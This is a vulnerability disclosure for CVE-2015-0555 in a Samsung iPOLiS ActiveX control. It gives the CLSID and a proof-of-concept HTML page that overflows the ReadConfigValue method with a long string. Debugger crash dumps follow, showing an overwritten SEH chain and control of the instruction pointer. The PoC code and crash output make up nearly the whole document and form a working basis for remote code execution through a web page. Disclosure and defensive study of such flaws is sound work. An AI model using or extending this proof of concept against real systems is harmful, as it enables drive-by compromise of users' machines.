CVE: 2015-0555
Vulnerable File: "C:\Program Files\Samsung\iPOLiS Device Manager\XnsSdkDeviceIpInstaller.ocx"
prototype: "Function ReadConfigValue ( ByVal szKey As String ) As String"
memberName: "ReadConfigValue"
progid/ActiveX: "XNSSDKDEVICELib.XnsSdkDevice"
Operating System: Windows 7 Ultimate N SP1
Vulnerable Software: Samsung iPOLiS 1.12.2
Proof of Concept
<html> <head> Samsung iPOLiS XnsSdkDeviceIpInstaller ActiveX ReadConfigValue Remote Code Execution PoC </head> <object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target'> </object> <script> var argCount = 1; var arg1= ""; for (i=0; i<= 4000; i++) { arg1 += "A"; } target.ReadConfigValue(arg1); </script> </html>Stack Trace
Exception Code: ACCESS_VIOLATION
Disasm: 6492CE MOV AL,[EDI+EDX]
Seh Chain:
--------------------------------------------------
1 41414141
Called From Returns To
--------------------------------------------------
XNSSDKDEVICE.6492CE 41414141
41414141 8ABAB41
8ABAB41 mfc100.64BA90C1
mfc100.64BA90C1 3D39D016
FFFFFFFE mfc100.64AFBE5C
Registers:
--------------------------------------------------
EIP 006492CE
EAX 00000408
EBX 01AD9FB0 -> 0065A564
ECX 00000414
EDX 08ABAB41
EDI 0000009C
ESI 0000009C
EBP 002DEA9C -> Asc: AAAAAAAAA
ESP 002DE7F4 -> 59D56B19 -> Asc: k k
Block Disassembly:
--------------------------------------------------
6492BD MOV ECX,EAX
6492BF XOR ESI,ESI
6492C1 MOV [EBP-298],ECX
6492C7 TEST ECX,ECX
6492C9 JLE SHORT 00649340
6492CB MOV EDX,[EBP+8]
6492CE MOV AL,[EDI+EDX] <--- crash="" p="">6492D1 CMP AL,2F
6492D3 JNZ SHORT 00649333
6492D5 TEST EDI,EDI
6492D7 JNZ SHORT 00649304
6492D9 PUSH 80
6492DE LEA EAX,[EBP-90]
6492E4 PUSH EDI
6492E5 PUSH EAX
ArgDump:
--------------------------------------------------
EBP+8 08ABAB41
EBP+12 64BA90C1 -> EBE84589
EBP+16 3D39D016
EBP+20 FFFFFFFE
EBP+24 64AFBE5C -> CCCCCCC3
EBP+28 00000018
Stack Dump:
--------------------------------------------------
2DE7F4 19 6B D5 59 08 00 00 00 A0 EA 2D 00 10 92 64 00 [.k.Y..........d.]
2DE804 14 04 00 00 64 65 C4 64 00 00 00 00 00 00 00 00 [....de.d........]
2DE814 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [................]
2DE824 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [................]
2DE834 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [................]
Exception Code: ACCESS_VIOLATION
Disasm: 41414141 ?????
Seh Chain:
--------------------------------------------------
1 41414141
Called From Returns To
--------------------------------------------------
ntdll.77B670B4 ntdll.77BDAB1A
ntdll.77BDAB1A ntdll.77BB0404
ntdll.77BB0404 ntdll.77B3F956
ntdll.77B3F956 ntdll.77B67017
ntdll.77B67017 41414141
41414141 8ABAB41
8ABAB41 mfc100.64BA90C1
mfc100.64BA90C1 3D39D016
FFFFFFFE mfc100.64AFBE5C
Registers:
--------------------------------------------------
EIP 77B670B4 -> C0000005
EAX 002DE0EC -> C0000005
EBX 41414141
ECX 41414141
EDX 00000000
EDI 00000000
ESI 002DE0EC -> C0000005
EBP 002DE0D8 -> 002DE40C
ESP 002DE088 -> 77B662A4
Block Disassembly:
--------------------------------------------------
77B6709C MOV [ESP+8],EBX
77B670A0 JMP 77B837AD
77B670A5 LEA ESP,[ESP]
77B670AC LEA ESP,[ESP]
77B670B0 MOV EDX,ESP
77B670B2 SYSENTER
77B670B4 RETN <--- crash="" p="">77B670B5 LEA ESP,[ESP]
77B670BC LEA ESP,[ESP]
77B670C0 LEA EDX,[ESP+8]
77B670C4 INT 2E
77B670C6 RETN
77B670C7 NOP
77B670C8 PUSH EBP
77B670C9 MOV EBP,ESP
ArgDump:
--------------------------------------------------
EBP+8 002DE0EC -> C0000005
EBP+12 002DE13C -> 00000000
EBP+16 00000000
EBP+20 C0000005
EBP+24 00000001
EBP+28 00000000
P.S. CERT tried to coordinate but there wasn't any response from Samsung--->--->